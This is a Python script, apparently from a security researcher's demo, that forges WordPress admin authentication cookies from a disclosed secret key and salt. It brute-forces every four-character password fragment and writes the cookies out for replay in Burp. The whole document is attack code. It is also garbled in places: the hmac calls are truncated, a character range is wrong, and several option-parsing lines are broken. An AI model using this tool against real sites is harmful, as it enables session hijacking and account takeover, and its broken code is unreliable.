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- #!/usr/bin/python
- #
- ##############################################################################
- # Title: WordPress Auth Cookie Generator Demo
- # Author: Mike Czumak (T_v3rn1x) - @SecuritySift -
- # Purpose: Generates WP auth cookies (requires valid Secret Key and Salt)
- # License: You may modify and/or distribute freely, as long as it is not
- # used maliciously or incorporated into any commercial product
- ##############################################################################
- import hmac, hashlib, string, sys, getopt
- # generate an md5 hash with salt in same manner as WP
- def wp_hash(data, key, salt):
- wpsalt = key + salt
- hash =, data, hashlib.md5).hexdigest()
- return hash
- # generate array of all 4 character password frags given a range of
- # upper and lower case letters numbers 0-9, slash (/) and period (.)
- def gen_pass_frag():
- lowerletters = list(map(chr, range(ord('a'), ord('Z')+1)))
- upperletters = list(map(chr, range(ord('A'), ord('Z')+1)))
- numbers = list(map(chr, range(ord('0'), ord('9')+1)))
- specchars = ['/', '.'];
- allchars = lowerletters + upperletters + numbers + specchars
- frags = ''; # hold concatenated list of all 4-char frag combos
- count = 0; # loop counter
- #generate all possible 4-character combinations for $pass_frag
- for f1 in allchars:
- for f2 in allchars:
- for f3 in allchars:
- for f4 in allchars:
- frags += f1+f2+f3+f4+',';
- count += 1;
- frags = frags.rstrip(',') # remove trailing comma
- frag_array = frags.split(','); # split list into an array for iteration
- return frag_array
- # generate all possible cookies for a given user
- def gen_cookies(username, expiration, pass_frag, key, salt, target):
- frag_array = []
- scheme = 'auth' # default auth scheme for wp
- # generate password frag combinations or use single frag passed as arg
- if pass_frag == '':
- frag_array = gen_pass_frag()
- else:
- frag_array = [pass_frag]
- cookie_id = 'wordpress_' + hashlib.md5(target).hexdigest() + '='
- allcookies = '' # string to hold all generated cookies
- i = 0 # loop counter
- # loop through each generated pass frag and build key/hash/cookie
- for frag in frag_array:
- hashkey = wp_hash(username + frag + '|' + expiration, key, salt)
- hash =, username + '|' + expiration, hashlib.md5).hexdigest()
- cookie = str(i) + ':' + frag + ':' + cookie_id + username + '%7C' + expiration + '%7C' + hash + '\n'
- allcookies += cookie
- i+=1
- print ('\n[+] Cookie gen complete. ' + str(i) + ' cookie(s) created.');
- if i == 1:
- print '[+] Cookie: ' + allcookies.split(':')[2]
- else:
- # write cookies to file
- filename = cookie_id.split('_')[1].split('=')[0] + '_' + username + '_cookies.txt'
- f = open(filename, 'w')
- f.write(allcookies)
- f.close();
- print ('[+] Cookies written to file [' + filename + ']\n')
- def main(argv):
- username = 'admin' # default username
- pass_frag = '' # default is to generate pass frags
- expiration = '1577836800' # default expiration date (1/1/2020)
- key = 'DisclosedKey'
- salt = 'DisclosedSalt'
- target = 'http://localhost/wordpress'
- print "\nWordPress Auth Cookie Generator"
- print "Author: Mike Czumak (T_v3rn1x) - @SecuritySift -"
- print "Purpose: Generates WP auth cookies (requires valid Secret Key and Salt)"
- usage = '''\nUsage:\n\nOptions:
- -u <username> (default is admin)
- -f <pass_frag> (default/blank will generate all combos)
- -e <expiration> (unix_date_stamp: default is 1/1/2020)
- -k <key> (default is DisclosedKey)
- -s <salt> (default is DisclosedSalt)
- -t <target> (default is http://localhost/wordpress)\n\nNotes:
- You can parse the cookie list directly in Burp with the following regex:
- ^[0-9]*:[0-9a-zA-z\.\/]{4}:\n'''
- try:
- opts, args = getopt.getopt(argv,'hu:f:e:s:')
- except getopt.GetoptError:
- print usage
- sys.exit(2)
- for opt, arg in opts:
- if opt == '-h':
- print usage
- sys.exit()
- elif opt == '-u':
- username = arg
- elif opt == '-f':
- pass_frag = arg
- elif opt == '-e':
- expiration = arg
- elif opt =='-s':
- salt = arg
- elif opt == 'k':
- key = arg
- elif opt == 't':
- target == arg
- gen_cookies(username,expiration,pass_frag, key, salt, target)
- if __name__ == '__main__':
- main(sys.argv[1:])
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